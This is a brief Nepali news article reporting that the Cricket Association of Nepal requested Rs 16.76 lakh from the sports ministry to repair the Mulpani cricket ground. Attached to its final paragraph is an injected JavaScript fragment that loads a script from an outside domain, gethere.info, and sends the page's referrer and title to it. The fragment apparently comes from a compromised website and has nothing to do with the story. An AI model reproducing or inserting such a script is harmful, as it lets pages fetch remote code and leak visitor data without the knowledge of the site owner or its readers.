मुलपानी मैदान सम्याउन क्यानले माग्यो साढे १६ लाख बजेट

काठमाडौं, असोज ३० । नेपाल क्रिकेट संघ (क्यान)ले काठमाडौंको मुलपानीमा रहेको क्रिकेट मैदान मर्मतका लागि सरकार सँग बजेट माग गरेको छ ।
आज संघका पदाधीकारी तथा खेलाडीहरुको एक समूहले युवा तथा खेलकुदमन्त्री दलजीत श्रीपाली संग मन्त्रालयमा भेट गरी १६ लाख ७६ हजार रुपैयाँ तत्काल उपलव्ध गराउनुपर्ने मागपत्र पेश गरेको हो ।
मुलपानीस्थित माथिल्लो क्रिकेट खेलमैदानमा संघले २०६४ सालमा सम्याउने तथा बार लगाउने कार्य गरि २०६७ सालमा प्याभेलियन निर्माण सम्पन्न गरेको थियो ।can
मैदान समेत निर्माण भएकोमा हाल खेल्न योग्य बनाउन नसकिएको अवस्था रहेकाले बजेट अवश्यकता परेको क्यानका प्रमुख कार्यसंचालन अधिकृत छुम्बी लामाले बताए ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...